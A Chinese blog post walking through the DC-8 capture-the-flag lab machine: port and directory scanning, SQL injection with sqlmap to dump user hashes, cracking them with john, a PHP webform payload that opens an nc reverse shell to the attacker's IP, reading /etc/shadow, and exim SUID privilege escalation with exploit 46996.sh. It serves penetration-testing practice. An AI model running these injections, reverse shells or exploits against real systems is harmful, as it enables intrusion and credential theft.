博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
<渗透练习>DC-8靶机渗透实验
阅读量:3951 次
发布时间:2019-05-24

本文共 3618 字,大约阅读时间需要 12 分钟。

靶机—DC-8

环境配置:

使用平台:VMware
网卡模式:NAT模式
所属网段:217
攻击机kali:192.168.217.131
靶机dc8:未知

一、信息获取

1.masscan -p22 192.168.217.0/24 --rate=2000 ---------扫描获取217网段下的linux系统的ip

在这里插入图片描述

获取到ip:192.168.217.148,目前只开启了kali和dc8,所以推测该ip为dc8的IP地址

2.nmap -sC -sV -p- -n 192.168.217.148 --min-rate=2000 -------扫描获取靶机端口信息

在这里插入图片描述

得到了: 22/tcp open ssh OpenSSH 7.4p1

80/tcp open http Apache httpd

3.searchsploit OpenSSH 7.4p1 ----------扫描ssh服务的系统漏洞

在这里插入图片描述

都是用户名枚举,没啥可用的

searchsploit Apache httpd ----------扫描http服务的系统漏洞

在这里插入图片描述

都没啥有用的

4…gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20------探测目录

在这里插入图片描述

探测出很多目录,403无法访问,301资源被永久转移无法访问,只有200可用

5.gobuster dir -u 192.168.217.148 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -s200

-----筛选出了状态200(可访问)的目录

在这里插入图片描述

/0 (Status: 200)

/node (Status: 200)
/robots.txt (Status: 200)
/user (Status: 200)

6.访问192.168.217.148查看网站首页

在这里插入图片描述

7.访问其余目录

192.168.217.148/0

在这里插入图片描述

与首页没什么区别

192.168.217.148/node

在这里插入图片描述

内容翻译:尚未创建首页内容

192.168.217.148/user

在这里插入图片描述

这是个登陆注册界面,很重要

192.168.217.148/robots.txt

在这里插入图片描述

都是文本

二、漏洞挖掘
1.先从首页看起,查看源代码,正经的html编写没啥有用的
2.点点旁边的跳转链接,有了新发现
在这里插入图片描述

在导航栏处发现了疑似sql语句的东西,可以试试是否存在sql注入,虽然个人很喜欢直接分析源码,但都看出来了就先试试

在这里插入图片描述

输入了’,发现网站报错,sql注入实锤,,最后一行还给出了一条路径,不知道有没有用,先准备尝试爆库

在这里插入图片描述

路径/var/www/html/sites/all/modules/mypages/mypages.module

3.爆库
方法一、手工注入

○1直接在导航栏上输入语句试试

在这里插入图片描述

还是报错界面,什么都没有,那抓包看看

○2nid换成0试试,

在这里插入图片描述

爆库名成功

○3爆表名

nid=0 union select group_concat(table_name) from

information_schema.tables where table_schema=database()

在这里插入图片描述

○4爆字段 nid=0 union select group_concat(column_name) from

information_schema.columns where table_name=’users’ and
table_schema=database()

在这里插入图片描述

○5爆数据 nid=0 union select group_concat(name,pass) from users

在这里插入图片描述

方法二、采取sqlmap

○1.sqlmap -u “http://192.168.217.148/?nid=1” --dbs --------获取数据库表名

在这里插入图片描述

获取到两个数据库名,显然,d7db是我们要的数据库

○2.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db --tables

------获取数据库表名

在这里插入图片描述在这里插入图片描述

一共探测出来了88个表,有一张users表,应该包含了登陆信息,继续探测

○3.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db -T users

–columns------探测表里的列

在这里插入图片描述

探测出来了16列,name和pass应该是登录的账号和密码

○4.sqlmap -u “http://192.168.217.148/?nid=1” -D d7db -T users -C

name,pass --dump ------获取数据

在这里插入图片描述

获取到了两行数据

S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

是一串加密数据

○5.用burp suite解码,所有模式都试过了全都不行,直接上百度 查到是要用john工具破解,用户名的john也是一种提示 Vi

john -------创建一个名为john的文件

把密码写入文档

在这里插入图片描述

John john --show ------开始对密码解码

在这里插入图片描述

只获得了一个数据turtle

打开之前探测到的登录界面尝试

admin turtle
john turtle
在这里插入图片描述

john turtle 进入成功,证明了admin密码破解失败

三、进入靶机

看到了ADD content 看到文本框,先输入点什么抓包看看
在这里插入图片描述在这里插入图片描述
用burp suite抓包看看

输入的内容都被转码了,无法直接编写shall脚本

再点点别的,在Contact Us 里找到了可以容纳php的地方

Contact Us–Webform–Form settings

在这里插入图片描述

此处输入

shell<?php system("nc -e /bin/sh 192.168.217.131 8888"); ?>

保存

在kali上开启监听

nc -lvvp 8888

在view中随便输入点内容,kali成功获得shell

在这里插入图片描述

whoami #查看当前用户身份

uname -a #查看系统信息
history #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等
last #查看登录历史
cat /etc/passwd #查看用户
cat /etc/shadow #查看密码

四、提权

先返回一个稳定的shell

python -c “import pty;pty.spawn(’/bin/bash’)”

uname –a----------查看内核信息

在这里插入图片描述

searchsploit Linux dc-8 4.9.0-4-amd64-----扫描内核漏洞

在这里插入图片描述

想先从内核漏洞提权出来,但是扫描不到结果

利用suid提权试试

find / -perm -u=s -type f 2>/dev/null ----查看具有root用户权限的文件

在这里插入图片描述

不知道哪个有用了,查看百度得知,exim4是个特殊文档那就扫描他的漏洞,根据经验exim4应该是exim的第四代,所以搜索exim的漏洞即可

searchsploit exim

---------探测漏洞

在这里插入图片描述

搜出来好多,根据翻译结果,Local Privilege Escalation译为本地权限提升,是我们需要的

选择.sh文件的46996.sh

locate 46996.sh -----定位文件

在这里插入图片描述

文件位置:

/usr/share/exploitdb/exploits/linux/local/46996.sh

靶机中:

scp root@192.168.217.131:/usr/share/exploitdb/exploits/linux

/local/46996.sh /tmp/q.sh ----获取文件

在这里插入图片描述

chmod 777 q.sh ----给予权限

bash ./q.sh -m netcat-----提权

失败,字符有问题,百度一下,源文件是doc格式,linux只识别unix,要在kali中修改文件格式再上传

cd /usr/share/exploitdb/exploits/linux/local/

vi 46996.sh :set ff? --------查询文件格式
:set ff=unix ------- 将文件格式改成Unix格式

在这里插入图片描述

再重做获取文件,权限基于和提权

在这里插入图片描述

提权成功

cd /root

ls
cat flag.txt

在这里插入图片描述

成功!

转载地址:http://wcuzi.baihongyu.com/

你可能感兴趣的文章
mysql 创建单表外键关联多表
查看>>
postman使用
查看>>
ClassNotFoundException和NoClassDefFoundError的区别
查看>>
Tomcat Connector三种运行模式(BIO, NIO, APR)的比较和优化
查看>>
spring注解@Primary与@Qualifier
查看>>
annotation之@Autowired、@Inject、@Resource三者区别
查看>>
idea启动微服务找不到配置文件
查看>>
Java通过反射机制调用某个类的方法
查看>>
字节跳到面试题
查看>>
Linux查看物理CPU个数
查看>>
Linux学习之网络IO,磁盘io
查看>>
ES7.6.2安装
查看>>
查看jar依赖树
查看>>
idea运行gradle项目
查看>>
es安装ltr插件
查看>>
开源ltr-es-7.6.2代码到本地idea打开出现各种错误总结
查看>>
Requests实践详解&& python通过连接开启https的elasticsearch7 服务器
查看>>
ES查询流程源码解析
查看>>
ldaps与ldap over TLS
查看>>
jvm为什么把-Xms和-Xmx的值设置成一样
查看>>